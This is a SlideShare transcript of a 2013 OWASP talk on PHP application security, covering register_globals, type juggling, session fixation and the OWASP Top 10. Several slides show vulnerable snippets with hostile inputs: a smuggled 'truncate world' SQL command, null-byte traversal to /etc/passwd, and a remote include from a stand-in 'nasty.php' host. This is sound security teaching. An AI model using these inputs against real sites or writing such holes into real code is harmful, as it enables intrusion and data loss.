PHP and Application Security - OWASP Road Show 2013
Upcoming SlideShare
Loading in...5
×
 

Like this? Share it with your network

Share

PHP and Application Security - OWASP Road Show 2013

on

  • 3,026 views

Presentation related to Information Security in the context of PHP programming. Principal pitfalls when programming PHP. Context of the PHP usage and evolution. ...

Presentation related to Information Security in the context of PHP programming. Principal pitfalls when programming PHP. Context of the PHP usage and evolution.

Video of the presentation: http://youtu.be/NTc5cZKZGF0

Statistics

Views

Total Views
3,026
Views on SlideShare
3,026
Embed Views
0

Actions

Likes
0
Downloads
11
Comments
0

0 Embeds 0

No embeds

Accessibility

Categories

Upload Details

Uploaded via as Adobe PDF

Usage Rights

© All Rights Reserved

Report content

Flagged as inappropriate Flag as inappropriate
Flag as inappropriate

Select your reason for flagging this presentation as inappropriate.

Cancel
  • Full Name Full Name Comment goes here.
    Are you sure you want to
    Your message goes here
    Processing…
Post Comment
Edit your comment

PHP and Application Security - OWASP Road Show 2013 Presentation Transcript

  • 1. Follow this topic:@rjsmeloPHP and Application Security#owasp #php #appsecRICARDO MELO
  • 2. @rjsmelo 2RICARDO MELO● CTO @ DRI● PHP, Mysql, Linux and lots of otherOSS● ZCE, RHCE, LPI 3, ITIL, etc
  • 3. 1999 - 2013 DRI. Alguns direitos reservados. 3Outline● PHP Context● Pain points● Resources
  • 4. 1999 - 2013 DRI. Alguns direitos reservados. 4OWASP - Builders, Breakers and Defenders● Builders - https://www.owasp.org/index.php/Builders● Breakers - https://www.owasp.org/index.php/Breakers● Defenders - https://www.owasp.org/index.php/Defenders
  • 5. 1999 - 2013 DRI. Alguns direitos reservados. 5Whats PHP?● PHP its a programming language● As born as “Personal Home Page”, butnowerdays is one of the most popularprogramming language on/for theinternet.● Gone away from its roots and switch itsname to - PHP: Hypertext Preprocessor
  • 6. 1999 - 2013 DRI. Alguns direitos reservados. 6PHP Anatomy● The language “Core” (the ifs e elses)● The “official” libraries of functions(extensions)● Al the rest– PEAR– PECL– Composer– OSS libraries
  • 7. 1999 - 2013 DRI. Alguns direitos reservados. 7What Makes PHP Popular● Low entry barrier● Imediate results● The “instantaneous reward” factor for theprogrammer● Solves the problems It proposes to inquick and effective way.
  • 8. 1999 - 2013 DRI. Alguns direitos reservados. 8In fact it was been defined as ...● Rasmus Lerdorf (the creator of PHP):“PHP has never been just a scripting engine with some cooladd-ons. PHP has always been the solution to the Web problemwith even more bonus add-ons. And as I have said so manytimes, PHP is not about purity in CS principles or architecture, itis about solving the ugly web problem with an admittedlyugly, but extremely functional and convenient solution. Ifyou are looking for purity you are in the wrong boat. Get outnow before you get hit by a wet cat!”
  • 9. 1999 - 2013 DRI. Alguns direitos reservados. 9Ease of use?● register_globals● magic_quotes● safe_mode● open_basedir
  • 10. 1999 - 2013 DRI. Alguns direitos reservados. 10Myths and Legends of PHP● PHP is insecure● But <insert your language here> itssecure● Frameworks will solve all our securityproblems
  • 11. 1999 - 2013 DRI. Alguns direitos reservados. 11Myths and Legends of PHP (2)● PHP is just for building some small sites.● If you really want to build an enterprisewebsite/portal/webapp/etc then you mustuse <enter your language here>
  • 12. 1999 - 2013 DRI. Alguns direitos reservados. 12Information Security“Information security means protecting informationand information systems from unauthorized access,use, disclosure, disruption, modification, perusal,inspection, recording or destruction”(http://en.wikipedia.org/wiki/Information_security)
  • 13. 1999 - 2013 DRI. Alguns direitos reservados. 13“Standard Approach”“[...] we need to improve the security ofour software [...]”● List of security Flaws– OWASP top 10– SANS top 25– Valid for all programming language and genéric enough● And a Book: “secure <yourprogramming language>”● Code review & pen test & ...
  • 14. 1999 - 2013 DRI. Alguns direitos reservados. 14Example: OWASP Top 10● A1-Injection● A2-Broken Authentication and SessionManagement● A3-Cross Site Scripting (XSS)● A4-Insecure Direct Object References● A5-Security Misconfiguration● A6-Sensitive Data Exposure● A7-Missing Function Level Access Control● A8-Cross-Site Request Forgery (CSRF)● A9-Using Components with KnownVulnerabilities● A10-Unvalidated Redirects and Forwards
  • 15. 1999 - 2013 DRI. Alguns direitos reservados. 15PHP and (in)Security● “With great power comes greatresponsibility”● The simplicity and flexibility of thelanguage often puts the programmers introubles● The “shared hosting” has bring the “all inthe webroot” kind of applications to thePHP world.– Remember: except by server configuration all files are availabledirectly from the internet.
  • 16. 1999 - 2013 DRI. Alguns direitos reservados. 16register_globals● The Classic...● All parameters passed to the script(GET, POST, COOKIE, SERVER)ends as globals.// call: http://server/script.php?authorized=1if ( some_function_to_chek($username,$password) {$authorized = 1;}if ( ! $authorized ) {exit;}// rest of the code
  • 17. 1999 - 2013 DRI. Alguns direitos reservados. 17$_REQUEST● $_REQUEST was a quick fix forregister_globals● Uses the same processing order asregister_globals● Instead of registering globals, registers“keys” on the array $_REQUEST● Mixing GET e POST can foster XSRF andothers.● Most recommends direct access to $_GET &$_POST to keep more control.
  • 18. 1999 - 2013 DRI. Alguns direitos reservados. 18Case Sensitive & Type insensitive● The first normally is not a problem...● But type insensitive brings someunexpected problems$country = "1 ; truncate world;";if ( $country > 0 ) {mysql_query("delete from world where country = {$country}");}echo (int)$country; // 1echo (string)$country; // 1; truncate world;
  • 19. 1999 - 2013 DRI. Alguns direitos reservados. 19Type juggling & Type cast● http://www.php.net/manual/en/language.types.type-juggling.php– Variable type is based on context● If you add (+) the its a int (or a float)● If you use string concatenation (.) then is a string● But you can force It!– (int), (float), (string), (array), (object), (unset)– settype$country = "1 ; truncate world;";settype($country,integer);echo (int)$country; // 1echo (string)$country; // 1
  • 20. 1999 - 2013 DRI. Alguns direitos reservados. 20PHP strings and .... C strings● PHP uses a great amount oflibraries ... in C.– “0” in PHP is one char as all the rest– But in C it means the end of string$file = $_GET[file]; // "../../etc/passwd0"if (file_exists(/home/wwwrun/.$file..php)) {// file_exists will return true as the// file /home/wwwrun/../../etc/passwd existsinclude /home/wwwrun/.$file..php;// the file /etc/passwd will be included}
  • 21. 1999 - 2013 DRI. Alguns direitos reservados. 21Streams● PHP uses streams to access “files”.● file:// — Accessing local filesystem● http:// — Accessing HTTP(s) URLs● ftp:// — Accessing FTP(s) URLs● php:// — Accessing various I/O streams● zlib:// — Compression Streams● data:// — Data (RFC 2397)● glob:// — Find pathnames matching pattern● phar:// — PHP Archive● ssh2:// — Secure Shell 2● rar:// — RAR● ogg:// — Audio streams● expect:// — Process Interaction Streams
  • 22. 1999 - 2013 DRI. Alguns direitos reservados. 22include / require● include / require uses streams meaningthat you can include / require via “http”,“ftp”, etc.● Except if you disable allow_url_fopen// $_GET[theme_path] => http://some-host.xpto/nasty.php?include "{$_GET[theme_path]}/header.inc";
  • 23. 1999 - 2013 DRI. Alguns direitos reservados. 23The trendy .inc● There was a trend of using .inc● Only supersede by the "rename" to.orig or .bak when doing live"debugging" directly on the servers● Normally if the file ends with “.php” thefile is processed by PHP, if itsnamed .inc or .orig is handled as aregular text file.
  • 24. 1999 - 2013 DRI. Alguns direitos reservados. 24SQL Injections and Mysql● Myth:– The mysql extension is vurnerable to SQL injection– To solve this you must use● Mysqli● PDO● Fact:– All extensions will allow you to do the queries that YOU want– So, there is the possibility do do SQL injection in all– The problem is between the chair and the keyboard– In fact they refer to using prepared statements.
  • 25. 1999 - 2013 DRI. Alguns direitos reservados. 25Session Magic● session_start()● It Just Works● Session Fixation– session.use_only_cookies (default 1 para o PHP5.3)– session_regenerate_id()
  • 26. 1999 - 2013 DRI. Alguns direitos reservados. 26Useful Resources● http://www.php.net● https://www.owasp.org/index.php/Top_Ten● https://www.owasp.org/index.php/Cheat_Sheets● https://www.owasp.org/index.php/PHP_Security_Cheat_Sheet (wip)● https://www.owasp.org/index.php/OWASP_Zed_Attack_Proxy_Project● https://www.owasp.org/index.php/OWASP_Guide_Project
  • 27. Follow this topic:@rjsmeloQA
  • 28. www.dri-global.com@rjsmeloricardo.melo@dri-global.com
  • 29. Thank you